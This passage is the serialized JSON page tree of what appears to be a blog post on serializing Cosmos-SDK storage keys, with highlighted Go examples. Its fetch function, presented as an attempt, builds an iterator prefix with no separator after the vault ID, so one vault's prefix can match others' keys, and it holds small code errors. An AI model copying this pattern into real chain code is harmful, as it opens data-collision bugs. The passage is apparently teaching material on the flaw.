style":369},[94215],{"type":30,"value":92295},{"type":24,"tag":301,"props":94217,"children":94218},{"style":359},[94219],{"type":30,"value":206},{"type":24,"tag":301,"props":94221,"children":94222},{"style":314},[94223],{"type":30,"value":92349},{"type":24,"tag":301,"props":94225,"children":94226},{"style":359},[94227],{"type":30,"value":362},{"type":24,"tag":301,"props":94229,"children":94230},{"style":369},[94231],{"type":30,"value":92258},{"type":24,"tag":301,"props":94233,"children":94234},{"style":359},[94235],{"type":30,"value":377},{"type":24,"tag":301,"props":94237,"children":94238},{"style":369},[94239],{"type":30,"value":92174},{"type":24,"tag":301,"props":94241,"children":94242},{"style":359},[94243],{"type":30,"value":791},{"type":24,"tag":301,"props":94245,"children":94246},{"class":303,"line":652},[94247],{"type":24,"tag":301,"props":94248,"children":94249},{"emptyLinePlaceholder":16},[94250],{"type":30,"value":341},{"type":24,"tag":301,"props":94252,"children":94253},{"class":303,"line":666},[94254,94258,94262,94266],{"type":24,"tag":301,"props":94255,"children":94256},{"style":369},[94257],{"type":30,"value":93259},{"type":24,"tag":301,"props":94259,"children":94260},{"style":385},[94261],{"type":30,"value":83129},{"type":24,"tag":301,"props":94263,"children":94264},{"style":314},[94265],{"type":30,"value":92267},{"type":24,"tag":301,"props":94267,"children":94268},{"style":359},[94269],{"type":30,"value":1707},{"type":24,"tag":301,"props":94271,"children":94272},{"class":303,"line":674},[94273,94277,94281],{"type":24,"tag":301,"props":94274,"children":94275},{"style":359},[94276],{"type":30,"value":93158},{"type":24,"tag":301,"props":94278,"children":94279},{"style":10246},[94280],{"type":30,"value":91469},{"type":24,"tag":301,"props":94282,"children":94283},{"style":359},[94284],{"type":30,"value":1729},{"type":24,"tag":301,"props":94286,"children":94287},{"class":303,"line":692},[94288,94292,94296,94300,94304,94308,94312,94316],{"type":24,"tag":301,"props":94289,"children":94290},{"style":369},[94291],{"type":30,"value":93174},{"type":24,"tag":301,"props":94293,"children":94294},{"style":359},[94295],{"type":30,"value":206},{"type":24,"tag":301,"props":94297,"children":94298},{"style":314},[94299],{"type":30,"value":92304},{"type":24,"tag":301,"props":94301,"children":94302},{"style":359},[94303],{"type":30,"value":362},{"type":24,"tag":301,"props":94305,"children":94306},{"style":314},[94307],{"type":30,"value":6156},{"type":24,"tag":301,"props":94309,"children":94310},{"style":359},[94311],{"type":30,"value":362},{"type":24,"tag":301,"props":94313,"children":94314},{"style":369},[94315],{"type":30,"value":92443},{"type":24,"tag":301,"props":94317,"children":94318},{"style":359},[94319],{"type":30,"value":92325},{"type":24,"tag":301,"props":94321,"children":94322},{"class":303,"line":3631},[94323],{"type":24,"tag":301,"props":94324,"children":94325},{"style":359},[94326],{"type":30,"value":30677},{"type":24,"tag":301,"props":94328,"children":94329},{"class":303,"line":3639},[94330,94334,94338,94342,94346,94350,94354,94358],{"type":24,"tag":301,"props":94331,"children":94332},{"style":369},[94333],{"type":30,"value":92295},{"type":24,"tag":301,"props":94335,"children":94336},{"style":359},[94337],{"type":30,"value":206},{"type":24,"tag":301,"props":94339,"children":94340},{"style":314},[94341],{"type":30,"value":92349},{"type":24,"tag":301,"props":94343,"children":94344},{"style":359},[94345],{"type":30,"value":362},{"type":24,"tag":301,"props":94347,"children":94348},{"style":369},[94349],{"type":30,"value":92384},{"type":24,"tag":301,"props":94351,"children":94352},{"style":359},[94353],{"type":30,"value":377},{"type":24,"tag":301,"props":94355,"children":94356},{"style":369},[94357],{"type":30,"value":92443},{"type":24,"tag":301,"props":94359,"children":94360},{"style":359},[94361],{"type":30,"value":791},{"type":24,"tag":301,"props":94363,"children":94364},{"class":303,"line":3647},[94365],{"type":24,"tag":301,"props":94366,"children":94367},{"emptyLinePlaceholder":16},[94368],{"type":30,"value":341},{"type":24,"tag":301,"props":94370,"children":94371},{"class":303,"line":3685},[94372,94376,94380,94384,94388,94392],{"type":24,"tag":301,"props":94373,"children":94374},{"style":369},[94375],{"type":30,"value":93378},{"type":24,"tag":301,"props":94377,"children":94378},{"style":385},[94379],{"type":30,"value":83129},{"type":24,"tag":301,"props":94381,"children":94382},{"style":369},[94383],{"type":30,"value":88939},{"type":24,"tag":301,"props":94385,"children":94386},{"style":359},[94387],{"type":30,"value":206},{"type":24,"tag":301,"props":94389,"children":94390},{"style":314},[94391],{"type":30,"value":91926},{"type":24,"tag":301,"props":94393,"children":94394},{"style":359},[94395],{"type":30,"value":1707},{"type":24,"tag":301,"props":94397,"children":94398},{"class":303,"line":3713},[94399,94404],{"type":24,"tag":301,"props":94400,"children":94401},{"style":329},[94402],{"type":30,"value":94403}," \"%s%d%s%s%s%s\"",{"type":24,"tag":301,"props":94405,"children":94406},{"style":359},[94407],{"type":30,"value":1729},{"type":24,"tag":301,"props":94409,"children":94410},{"class":303,"line":3721},[94411,94416],{"type":24,"tag":301,"props":94412,"children":94413},{"style":369},[94414],{"type":30,"value":94415}," PositionMapPrefix",{"type":24,"tag":301,"props":94417,"children":94418},{"style":359},[94419],{"type":30,"value":1729},{"type":24,"tag":301,"props":94421,"children":94422},{"class":303,"line":3751},[94423,94427],{"type":24,"tag":301,"props":94424,"children":94425},{"style":369},[94426],{"type":30,"value":93418},{"type":24,"tag":301,"props":94428,"children":94429},{"style":359},[94430],{"type":30,"value":1729},{"type":24,"tag":301,"props":94432,"children":94433},{"class":303,"line":3782},[94434,94438],{"type":24,"tag":301,"props":94435,"children":94436},{"style":369},[94437],{"type":30,"value":93430},{"type":24,"tag":301,"props":94439,"children":94440},{"style":359},[94441],{"type":30,"value":1729},{"type":24,"tag":301,"props":94443,"children":94444},{"class":303,"line":3791},[94445,94449],{"type":24,"tag":301,"props":94446,"children":94447},{"style":369},[94448],{"type":30,"value":93442},{"type":24,"tag":301,"props":94450,"children":94451},{"style":359},[94452],{"type":30,"value":1729},{"type":24,"tag":301,"props":94454,"children":94455},{"class":303,"line":3819},[94456,94460],{"type":24,"tag":301,"props":94457,"children":94458},{"style":369},[94459],{"type":30,"value":93430},{"type":24,"tag":301,"props":94461,"children":94462},{"style":359},[94463],{"type":30,"value":1729},{"type":24,"tag":301,"props":94465,"children":94466},{"class":303,"line":4397},[94467,94471],{"type":24,"tag":301,"props":94468,"children":94469},{"style":369},[94470],{"type":30,"value":93465},{"type":24,"tag":301,"props":94472,"children":94473},{"style":359},[94474],{"type":30,"value":1729},{"type":24,"tag":301,"props":94476,"children":94477},{"class":303,"line":4405},[94478],{"type":24,"tag":301,"props":94479,"children":94480},{"style":359},[94481],{"type":30,"value":30677},{"type":24,"tag":301,"props":94483,"children":94484},{"class":303,"line":4422},[94485],{"type":24,"tag":301,"props":94486,"children":94487},{"style":359},[94488],{"type":30,"value":698},{"type":24,"tag":301,"props":94490,"children":94491},{"class":303,"line":4438},[94492],{"type":24,"tag":301,"props":94493,"children":94494},{"emptyLinePlaceholder":16},[94495],{"type":30,"value":341},{"type":24,"tag":301,"props":94497,"children":94498},{"class":303,"line":4446},[94499],{"type":24,"tag":301,"props":94500,"children":94501},{"emptyLinePlaceholder":16},[94502],{"type":30,"value":341},{"type":24,"tag":301,"props":94504,"children":94505},{"class":303,"line":4506},[94506,94510,94514],{"type":24,"tag":301,"props":94507,"children":94508},{"style":348},[94509],{"type":30,"value":83013},{"type":24,"tag":301,"props":94511,"children":94512},{"style":314},[94513],{"type":30,"value":93509},{"type":24,"tag":301,"props":94515,"children":94516},{"style":359},[94517],{"type":30,"value":1707},{"type":24,"tag":301,"props":94519,"children":94520},{"class":303,"line":4566},[94521,94525,94529],{"type":24,"tag":301,"props":94522,"children":94523},{"style":369},[94524],{"type":30,"value":91950},{"type":24,"tag":301,"props":94526,"children":94527},{"style":10246},[94528],{"type":30,"value":83134},{"type":24,"tag":301,"props":94530,"children":94531},{"style":359},[94532],{"type":30,"value":1729},{"type":24,"tag":301,"props":94534,"children":94535},{"class":303,"line":4574},[94536,94540,94544,94548,94552,94556],{"type":24,"tag":301,"props":94537,"children":94538},{"style":369},[94539],{"type":30,"value":91962},{"type":24,"tag":301,"props":94541,"children":94542},{"style":359},[94543],{"type":30,"value":377},{"type":24,"tag":301,"props":94545,"children":94546},{"style":369},[94547],{"type":30,"value":93544},{"type":24,"tag":301,"props":94549,"children":94550},{"style":359},[94551],{"type":30,"value":82940},{"type":24,"tag":301,"props":94553,"children":94554},{"style":10246},[94555],{"type":30,"value":91469},{"type":24,"tag":301,"props":94557,"children":94558},{"style":359},[94559],{"type":30,"value":1729},{"type":24,"tag":301,"props":94561,"children":94562},{"class":303,"line":4590},[94563,94567,94571,94575,94579],{"type":24,"tag":301,"props":94564,"children":94565},{"style":359},[94566],{"type":30,"value":83095},{"type":24,"tag":301,"props":94568,"children":94569},{"style":369},[94570],{"type":30,"value":78868},{"type":24,"tag":301,"props":94572,"children":94573},{"style":359},[94574],{"type":30,"value":82940},{"type":24,"tag":301,"props":94576,"children":94577},{"style":10246},[94578],{"type":30,"value":91469},{"type":24,"tag":301,"props":94580,"children":94581},{"style":359},[94582],{"type":30,"value":398},{"type":24,"tag":301,"props":94584,"children":94585},{"class":303,"line":4599},[94586,94590,94594,94598],{"type":24,"tag":301,"props":94587,"children":94588},{"style":369},[94589],{"type":30,"value":92564},{"type":24,"tag":301,"props":94591,"children":94592},{"style":385},[94593],{"type":30,"value":83129},{"type":24,"tag":301,"props":94595,"children":94596},{"style":314},[94597],{"type":30,"value":92267},{"type":24,"tag":301,"props":94599,"children":94600},{"style":359},[94601],{"type":30,"value":1707},{"type":24,"tag":301,"props":94603,"children":94604},{"class":303,"line":4629},[94605,94609,94613],{"type":24,"tag":301,"props":94606,"children":94607},{"style":359},[94608],{"type":30,"value":93158},{"type":24,"tag":301,"props":94610,"children":94611},{"style":10246},[94612],{"type":30,"value":91469},{"type":24,"tag":301,"props":94614,"children":94615},{"style":359},[94616],{"type":30,"value":1729},{"type":24,"tag":301,"props":94618,"children":94619},{"class":303,"line":4659},[94620,94624,94628,94632,94636,94640,94644,94648],{"type":24,"tag":301,"props":94621,"children":94622},{"style":369},[94623],{"type":30,"value":93174},{"type":24,"tag":301,"props":94625,"children":94626},{"style":359},[94627],{"type":30,"value":206},{"type":24,"tag":301,"props":94629,"children":94630},{"style":314},[94631],{"type":30,"value":92304},{"type":24,"tag":301,"props":94633,"children":94634},{"style":359},[94635],{"type":30,"value":362},{"type":24,"tag":301,"props":94637,"children":94638},{"style":314},[94639],{"type":30,"value":6156},{"type":24,"tag":301,"props":94641,"children":94642},{"style":359},[94643],{"type":30,"value":362},{"type":24,"tag":301,"props":94645,"children":94646},{"style":369},[94647],{"type":30,"value":92174},{"type":24,"tag":301,"props":94649,"children":94650},{"style":359},[94651],{"type":30,"value":92325},{"type":24,"tag":301,"props":94653,"children":94654},{"class":303,"line":4668},[94655],{"type":24,"tag":301,"props":94656,"children":94657},{"style":359},[94658],{"type":30,"value":30677},{"type":24,"tag":301,"props":94660,"children":94661},{"class":303,"line":4677},[94662,94666,94670,94674,94678,94682,94686,94690],{"type":24,"tag":301,"props":94663,"children":94664},{"style":369},[94665],{"type":30,"value":92295},{"type":24,"tag":301,"props":94667,"children":94668},{"style":359},[94669],{"type":30,"value":206},{"type":24,"tag":301,"props":94671,"children":94672},{"style":314},[94673],{"type":30,"value":92349},{"type":24,"tag":301,"props":94675,"children":94676},{"style":359},[94677],{"type":30,"value":362},{"type":24,"tag":301,"props":94679,"children":94680},{"style":369},[94681],{"type":30,"value":92258},{"type":24,"tag":301,"props":94683,"children":94684},{"style":359},[94685],{"type":30,"value":377},{"type":24,"tag":301,"props":94687,"children":94688},{"style":369},[94689],{"type":30,"value":92174},{"type":24,"tag":301,"props":94691,"children":94692},{"style":359},[94693],{"type":30,"value":791},{"type":24,"tag":301,"props":94695,"children":94696},{"class":303,"line":4697},[94697],{"type":24,"tag":301,"props":94698,"children":94699},{"emptyLinePlaceholder":16},[94700],{"type":30,"value":341},{"type":24,"tag":301,"props":94702,"children":94703},{"class":303,"line":4725},[94704,94708,94712,94716],{"type":24,"tag":301,"props":94705,"children":94706},{"style":369},[94707],{"type":30,"value":93701},{"type":24,"tag":301,"props":94709,"children":94710},{"style":385},[94711],{"type":30,"value":83129},{"type":24,"tag":301,"props":94713,"children":94714},{"style":314},[94715],{"type":30,"value":92267},{"type":24,"tag":301,"props":94717,"children":94718},{"style":359},[94719],{"type":30,"value":1707},{"type":24,"tag":301,"props":94721,"children":94722},{"class":303,"line":4733},[94723,94727,94731],{"type":24,"tag":301,"props":94724,"children":94725},{"style":359},[94726],{"type":30,"value":93158},{"type":24,"tag":301,"props":94728,"children":94729},{"style":10246},[94730],{"type":30,"value":91469},{"type":24,"tag":301,"props":94732,"children":94733},{"style":359},[94734],{"type":30,"value":1729},{"type":24,"tag":301,"props":94736,"children":94737},{"class":303,"line":4741},[94738,94742,94746,94750,94754,94758,94762,94766],{"type":24,"tag":301,"props":94739,"children":94740},{"style":369},[94741],{"type":30,"value":93174},{"type":24,"tag":301,"props":94743,"children":94744},{"style":359},[94745],{"type":30,"value":206},{"type":24,"tag":301,"props":94747,"children":94748},{"style":314},[94749],{"type":30,"value":92304},{"type":24,"tag":301,"props":94751,"children":94752},{"style":359},[94753],{"type":30,"value":362},{"type":24,"tag":301,"props":94755,"children":94756},{"style":314},[94757],{"type":30,"value":6156},{"type":24,"tag":301,"props":94759,"children":94760},{"style":359},[94761],{"type":30,"value":362},{"type":24,"tag":301,"props":94763,"children":94764},{"style":369},[94765],{"type":30,"value":93544},{"type":24,"tag":301,"props":94767,"children":94768},{"style":359},[94769],{"type":30,"value":92325},{"type":24,"tag":301,"props":94771,"children":94772},{"class":303,"line":4757},[94773],{"type":24,"tag":301,"props":94774,"children":94775},{"style":359},[94776],{"type":30,"value":30677},{"type":24,"tag":301,"props":94778,"children":94779},{"class":303,"line":4765},[94780,94784,94788,94792,94796,94800,94804,94808],{"type":24,"tag":301,"props":94781,"children":94782},{"style":369},[94783],{"type":30,"value":92295},{"type":24,"tag":301,"props":94785,"children":94786},{"style":359},[94787],{"type":30,"value":206},{"type":24,"tag":301,"props":94789,"children":94790},{"style":314},[94791],{"type":30,"value":92349},{"type":24,"tag":301,"props":94793,"children":94794},{"style":359},[94795],{"type":30,"value":362},{"type":24,"tag":301,"props":94797,"children":94798},{"style":369},[94799],{"type":30,"value":93794},{"type":24,"tag":301,"props":94801,"children":94802},{"style":359},[94803],{"type":30,"value":377},{"type":24,"tag":301,"props":94805,"children":94806},{"style":369},[94807],{"type":30,"value":93544},{"type":24,"tag":301,"props":94809,"children":94810},{"style":359},[94811],{"type":30,"value":791},{"type":24,"tag":301,"props":94813,"children":94814},{"class":303,"line":4773},[94815],{"type":24,"tag":301,"props":94816,"children":94817},{"emptyLinePlaceholder":16},[94818],{"type":30,"value":341},{"type":24,"tag":301,"props":94820,"children":94821},{"class":303,"line":4781},[94822,94826,94830,94834,94838,94842],{"type":24,"tag":301,"props":94823,"children":94824},{"style":369},[94825],{"type":30,"value":93378},{"type":24,"tag":301,"props":94827,"children":94828},{"style":385},[94829],{"type":30,"value":83129},{"type":24,"tag":301,"props":94831,"children":94832},{"style":369},[94833],{"type":30,"value":88939},{"type":24,"tag":301,"props":94835,"children":94836},{"style":359},[94837],{"type":30,"value":206},{"type":24,"tag":301,"props":94839,"children":94840},{"style":314},[94841],{"type":30,"value":91926},{"type":24,"tag":301,"props":94843,"children":94844},{"style":359},[94845],{"type":30,"value":1707},{"type":24,"tag":301,"props":94847,"children":94848},{"class":303,"line":4789},[94849,94853],{"type":24,"tag":301,"props":94850,"children":94851},{"style":329},[94852],{"type":30,"value":94403},{"type":24,"tag":301,"props":94854,"children":94855},{"style":359},[94856],{"type":30,"value":1729},{"type":24,"tag":301,"props":94858,"children":94859},{"class":303,"line":4848},[94860,94865],{"type":24,"tag":301,"props":94861,"children":94862},{"style":369},[94863],{"type":30,"value":94864}," AddressMapPrefix",{"type":24,"tag":301,"props":94866,"children":94867},{"style":359},[94868],{"type":30,"value":1729},{"type":24,"tag":301,"props":94870,"children":94871},{"class":303,"line":4862},[94872,94876],{"type":24,"tag":301,"props":94873,"children":94874},{"style":369},[94875],{"type":30,"value":93418},{"type":24,"tag":301,"props":94877,"children":94878},{"style":359},[94879],{"type":30,"value":1729},{"type":24,"tag":301,"props":94881,"children":94882},{"class":303,"line":4871},[94883,94887],{"type":24,"tag":301,"props":94884,"children":94885},{"style":369},[94886],{"type":30,"value":93430},{"type":24,"tag":301,"props":94888,"children":94889},{"style":359},[94890],{"type":30,"value":1729},{"type":24,"tag":301,"props":94892,"children":94893},{"class":303,"line":4879},[94894,94898],{"type":24,"tag":301,"props":94895,"children":94896},{"style":369},[94897],{"type":30,"value":93442},{"type":24,"tag":301,"props":94899,"children":94900},{"style":359},[94901],{"type":30,"value":1729},{"type":24,"tag":301,"props":94903,"children":94904},{"class":303,"line":4942},[94905,94909],{"type":24,"tag":301,"props":94906,"children":94907},{"style":369},[94908],{"type":30,"value":93430},{"type":24,"tag":301,"props":94910,"children":94911},{"style":359},[94912],{"type":30,"value":1729},{"type":24,"tag":301,"props":94914,"children":94915},{"class":303,"line":4955},[94916,94920],{"type":24,"tag":301,"props":94917,"children":94918},{"style":369},[94919],{"type":30,"value":93903},{"type":24,"tag":301,"props":94921,"children":94922},{"style":359},[94923],{"type":30,"value":1729},{"type":24,"tag":301,"props":94925,"children":94927},{"class":303,"line":94926},60,[94928],{"type":24,"tag":301,"props":94929,"children":94930},{"style":359},[94931],{"type":30,"value":30677},{"type":24,"tag":301,"props":94933,"children":94935},{"class":303,"line":94934},61,[94936],{"type":24,"tag":301,"props":94937,"children":94938},{"style":359},[94939],{"type":30,"value":698},{"type":24,"tag":32,"props":94941,"children":94942},{},[94943],{"type":30,"value":94944},"We now have a proper example of how to serialize storage keys.",{"type":24,"tag":32,"props":94946,"children":94947},{},[94948,94950,94955],{"type":30,"value":94949},"Nonetheless, there is more to storage than just this. As previously mentioned, storages are expected to support their original functionalities. In the case of ",{"type":24,"tag":145,"props":94951,"children":94953},{"className":94952},[],[94954],{"type":30,"value":73814},{"type":30,"value":94956},", data should still be retrievable through original keys.",{"type":24,"tag":32,"props":94958,"children":94959},{},[94960,94962,94968,94970,94975],{"type":30,"value":94961},"Let's look at a case where we want to retrieve all ",{"type":24,"tag":145,"props":94963,"children":94965},{"className":94964},[],[94966],{"type":30,"value":94967},"map[Username]map[PositionName]Position",{"type":30,"value":94969}," associated with a ",{"type":24,"tag":145,"props":94971,"children":94973},{"className":94972},[],[94974],{"type":30,"value":91838},{"type":30,"value":94976}," from the storage. How can we safely accomplish this?",{"type":24,"tag":32,"props":94978,"children":94979},{},[94980,94982,94987,94989,94995],{"type":30,"value":94981},"Fortunately, the Cosmos-SDK provides APIs to fetch all entries associated with a ",{"type":24,"tag":145,"props":94983,"children":94985},{"className":94984},[],[94986],{"type":30,"value":91909},{"type":30,"value":94988}," prefix. Below is an example of an attempt to fetch data with ",{"type":24,"tag":145,"props":94990,"children":94992},{"className":94991},[],[94993],{"type":30,"value":94994},"vaultId",{"type":30,"value":1679},{"type":24,"tag":291,"props":94997,"children":94999},{"code":94998,"language":82877,"meta":7,"className":82878,"style":7},"func FetchPositionMapWithVaultId(\n vaultId uint64,\n) ([]map[Username]map[PositionName]Position) {\n values := map[Username]map[PositionName]Position{}\n i := sdk.KVStorePrefixIterator(\n kvStore,\n fmt.Sprintf(\"%s%d\", PositionMapPrefix, vaultId)\n )\n for ; i.Valid(); i.Next() {\n k := strings.split(i.Key(), Seperator)\n\n username := make([]byte, hex.DecodedLen(k[0]))\n _, err := hex.Decode(username, k[0])\n if err != nil {\n return nil, err\n }\n\n positionName := make([]byte, hex.DecodedLen(k[1]))\n _, err := hex.Decode(positionName, k[1])\n if err != nil {\n return nil, err\n }\n\n if entry, ok := values[username]; !ok {\n values[username] = make(map[PositionName])\n }\n\n values[username][positionName] = Position {\n data: iterator.Value(),\n }\n }\n return values\n}\n",[95000],{"type":24,"tag":145,"props":95001,"children":95002},{"__ignoreMap":7},[95003,95019,95034,95083,95135,95164,95176,95222,95229,95275,95330,95337,95401,95462,95485,95504,95511,95518,95578,95637,95660,95679,95686,95693,95746,95794,95801,95808,95848,95877,95884,95891,95903],{"type":24,"tag":301,"props":95004,"children":95005},{"class":303,"line":304},[95006,95010,95015],{"type":24,"tag":301,"props":95007,"children":95008},{"style":348},[95009],{"type":30,"value":83013},{"type":24,"tag":301,"props":95011,"children":95012},{"style":314},[95013],{"type":30,"value":95014}," FetchPositionMapWithVaultId",{"type":24,"tag":301,"props":95016,"children":95017},{"style":359},[95018],{"type":30,"value":1707},{"type":24,"tag":301,"props":95020,"children":95021},{"class":303,"line":320},[95022,95026,95030],{"type":24,"tag":301,"props":95023,"children":95024},{"style":369},[95025],{"type":30,"value":91950},{"type":24,"tag":301,"props":95027,"children":95028},{"style":10246},[95029],{"type":30,"value":83134},{"type":24,"tag":301,"props":95031,"children":95032},{"style":359},[95033],{"type":30,"value":1729},{"type":24,"tag":301,"props":95035,"children":95036},{"class":303,"line":335},[95037,95042,95046,95050,95054,95058,95062,95066,95070,95074,95079],{"type":24,"tag":301,"props":95038,"children":95039},{"style":359},[95040],{"type":30,"value":95041},") ([]",{"type":24,"tag":301,"props":95043,"children":95044},{"style":348},[95045],{"type":30,"value":73814},{"type":24,"tag":301,"props":95047,"children":95048},{"style":359},[95049],{"type":30,"value":541},{"type":24,"tag":301,"props":95051,"children":95052},{"style":10246},[95053],{"type":30,"value":91855},{"type":24,"tag":301,"props":95055,"children":95056},{"style":359},[95057],{"type":30,"value":22200},{"type":24,"tag":301,"props":95059,"children":95060},{"style":348},[95061],{"type":30,"value":73814},{"type":24,"tag":301,"props":95063,"children":95064},{"style":359},[95065],{"type":30,"value":541},{"type":24,"tag":301,"props":95067,"children":95068},{"style":10246},[95069],{"type":30,"value":91872},{"type":24,"tag":301,"props":95071,"children":95072},{"style":359},[95073],{"type":30,"value":22200},{"type":24,"tag":301,"props":95075,"children":95076},{"style":10246},[95077],{"type":30,"value":95078},"Position",{"type":24,"tag":301,"props":95080,"children":95081},{"style":359},[95082],{"type":30,"value":398},{"type":24,"tag":301,"props":95084,"children":95085},{"class":303,"line":344},[95086,95091,95095,95099,95103,95107,95111,95115,95119,95123,95127,95131],{"type":24,"tag":301,"props":95087,"children":95088},{"style":369},[95089],{"type":30,"value":95090}," values",{"type":24,"tag":301,"props":95092,"children":95093},{"style":385},[95094],{"type":30,"value":83129},{"type":24,"tag":301,"props":95096,"children":95097},{"style":348},[95098],{"type":30,"value":56399},{"type":24,"tag":301,"props":95100,"children":95101},{"style":359},[95102],{"type":30,"value":541},{"type":24,"tag":301,"props":95104,"children":95105},{"style":10246},[95106],{"type":30,"value":91855},{"type":24,"tag":301,"props":95108,"children":95109},{"style":359},[95110],{"type":30,"value":22200},{"type":24,"tag":301,"props":95112,"children":95113},{"style":348},[95114],{"type":30,"value":73814},{"type":24,"tag":301,"props":95116,"children":95117},{"style":359},[95118],{"type":30,"value":541},{"type":24,"tag":301,"props":95120,"children":95121},{"style":10246},[95122],{"type":30,"value":91872},{"type":24,"tag":301,"props":95124,"children":95125},{"style":359},[95126],{"type":30,"value":22200},{"type":24,"tag":301,"props":95128,"children":95129},{"style":10246},[95130],{"type":30,"value":95078},{"type":24,"tag":301,"props":95132,"children":95133},{"style":359},[95134],{"type":30,"value":84809},{"type":24,"tag":301,"props":95136,"children":95137},{"class":303,"line":401},[95138,95143,95147,95151,95155,95160],{"type":24,"tag":301,"props":95139,"children":95140},{"style":369},[95141],{"type":30,"value":95142}," i",{"type":24,"tag":301,"props":95144,"children":95145},{"style":385},[95146],{"type":30,"value":83129},{"type":24,"tag":301,"props":95148,"children":95149},{"style":369},[95150],{"type":30,"value":85353},{"type":24,"tag":301,"props":95152,"children":95153},{"style":359},[95154],{"type":30,"value":206},{"type":24,"tag":301,"props":95156,"children":95157},{"style":314},[95158],{"type":30,"value":95159},"KVStorePrefixIterator",{"type":24,"tag":301,"props":95161,"children":95162},{"style":359},[95163],{"type":30,"value":1707},{"type":24,"tag":301,"props":95165,"children":95166},{"class":303,"line":415},[95167,95172],{"type":24,"tag":301,"props":95168,"children":95169},{"style":369},[95170],{"type":30,"value":95171}," kvStore",{"type":24,"tag":301,"props":95173,"children":95174},{"style":359},[95175],{"type":30,"value":1729},{"type":24,"tag":301,"props":95177,"children":95178},{"class":303,"line":439},[95179,95184,95188,95192,95196,95201,95205,95210,95214,95218],{"type":24,"tag":301,"props":95180,"children":95181},{"style":369},[95182],{"type":30,"value":95183}," fmt",{"type":24,"tag":301,"props":95185,"children":95186},{"style":359},[95187],{"type":30,"value":206},{"type":24,"tag":301,"props":95189,"children":95190},{"style":314},[95191],{"type":30,"value":91926},{"type":24,"tag":301,"props":95193,"children":95194},{"style":359},[95195],{"type":30,"value":362},{"type":24,"tag":301,"props":95197,"children":95198},{"style":329},[95199],{"type":30,"value":95200},"\"%s%d\"",{"type":24,"tag":301,"props":95202,"children":95203},{"style":359},[95204],{"type":30,"value":377},{"type":24,"tag":301,"props":95206,"children":95207},{"style":369},[95208],{"type":30,"value":95209},"PositionMapPrefix",{"type":24,"tag":301,"props":95211,"children":95212},{"style":359},[95213],{"type":30,"value":377},{"type":24,"tag":301,"props":95215,"children":95216},{"style":369},[95217],{"type":30,"value":94994},{"type":24,"tag":301,"props":95219,"children":95220},{"style":359},[95221],{"type":30,"value":791},{"type":24,"tag":301,"props":95223,"children":95224},{"class":303,"line":447},[95225],{"type":24,"tag":301,"props":95226,"children":95227},{"style":359},[95228],{"type":30,"value":30677},{"type":24,"tag":301,"props":95230,"children":95231},{"class":303,"line":476},[95232,95236,95241,95245,95249,95254,95258,95262,95266,95271],{"type":24,"tag":301,"props":95233,"children":95234},{"style":308},[95235],{"type":30,"value":3249},{"type":24,"tag":301,"props":95237,"children":95238},{"style":359},[95239],{"type":30,"value":95240}," ; ",{"type":24,"tag":301,"props":95242,"children":95243},{"style":369},[95244],{"type":30,"value":10564},{"type":24,"tag":301,"props":95246,"children":95247},{"style":359},[95248],{"type":30,"value":206},{"type":24,"tag":301,"props":95250,"children":95251},{"style":314},[95252],{"type":30,"value":95253},"Valid",{"type":24,"tag":301,"props":95255,"children":95256},{"style":359},[95257],{"type":30,"value":35204},{"type":24,"tag":301,"props":95259,"children":95260},{"style":369},[95261],{"type":30,"value":10564},{"type":24,"tag":301,"props":95263,"children":95264},{"style":359},[95265],{"type":30,"value":206},{"type":24,"tag":301,"props":95267,"children":95268},{"style":314},[95269],{"type":30,"value":95270},"Next",{"type":24,"tag":301,"props":95272,"children":95273},{"style":359},[95274],{"type":30,"value":3883},{"type":24,"tag":301,"props":95276,"children":95277},{"class":303,"line":495},[95278,95283,95287,95292,95296,95300,95304,95308,95312,95317,95321,95326],{"type":24,"tag":301,"props":95279,"children":95280},{"style":369},[95281],{"type":30,"value":95282}," k",{"type":24,"tag":301,"props":95284,"children":95285},{"style":385},[95286],{"type":30,"value":83129},{"type":24,"tag":301,"props":95288,"children":95289},{"style":369},[95290],{"type":30,"value":95291}," strings",{"type":24,"tag":301,"props":95293,"children":95294},{"style":359},[95295],{"type":30,"value":206},{"type":24,"tag":301,"props":95297,"children":95298},{"style":314},[95299],{"type":30,"value":76755},{"type":24,"tag":301,"props":95301,"children":95302},{"style":359},[95303],{"type":30,"value":362},{"type":24,"tag":301,"props":95305,"children":95306},{"style":369},[95307],{"type":30,"value":10564},{"type":24,"tag":301,"props":95309,"children":95310},{"style":359},[95311],{"type":30,"value":206},{"type":24,"tag":301,"props":95313,"children":95314},{"style":314},[95315],{"type":30,"value":95316},"Key",{"type":24,"tag":301,"props":95318,"children":95319},{"style":359},[95320],{"type":30,"value":25153},{"type":24,"tag":301,"props":95322,"children":95323},{"style":369},[95324],{"type":30,"value":95325},"Seperator",{"type":24,"tag":301,"props":95327,"children":95328},{"style":359},[95329],{"type":30,"value":791},{"type":24,"tag":301,"props":95331,"children":95332},{"class":303,"line":504},[95333],{"type":24,"tag":301,"props":95334,"children":95335},{"emptyLinePlaceholder":16},[95336],{"type":30,"value":341},{"type":24,"tag":301,"props":95338,"children":95339},{"class":303,"line":512},[95340,95345,95349,95353,95358,95362,95366,95370,95374,95379,95383,95388,95392,95396],{"type":24,"tag":301,"props":95341,"children":95342},{"style":369},[95343],{"type":30,"value":95344}," username",{"type":24,"tag":301,"props":95346,"children":95347},{"style":385},[95348],{"type":30,"value":83129},{"type":24,"tag":301,"props":95350,"children":95351},{"style":314},[95352],{"type":30,"value":92267},{"type":24,"tag":301,"props":95354,"children":95355},{"style":359},[95356],{"type":30,"value":95357},"([]",{"type":24,"tag":301,"props":95359,"children":95360},{"style":10246},[95361],{"type":30,"value":91469},{"type":24,"tag":301,"props":95363,"children":95364},{"style":359},[95365],{"type":30,"value":377},{"type":24,"tag":301,"props":95367,"children":95368},{"style":369},[95369],{"type":30,"value":92340},{"type":24,"tag":301,"props":95371,"children":95372},{"style":359},[95373],{"type":30,"value":206},{"type":24,"tag":301,"props":95375,"children":95376},{"style":314},[95377],{"type":30,"value":95378},"DecodedLen",{"type":24,"tag":301,"props":95380,"children":95381},{"style":359},[95382],{"type":30,"value":362},{"type":24,"tag":301,"props":95384,"children":95385},{"style":369},[95386],{"type":30,"value":95387},"k",{"type":24,"tag":301,"props":95389,"children":95390},{"style":359},[95391],{"type":30,"value":541},{"type":24,"tag":301,"props":95393,"children":95394},{"style":466},[95395],{"type":30,"value":584},{"type":24,"tag":301,"props":95397,"children":95398},{"style":359},[95399],{"type":30,"value":95400},"]))\n",{"type":24,"tag":301,"props":95402,"children":95403},{"class":303,"line":592},[95404,95408,95412,95416,95420,95425,95429,95434,95438,95442,95446,95450,95454,95458],{"type":24,"tag":301,"props":95405,"children":9540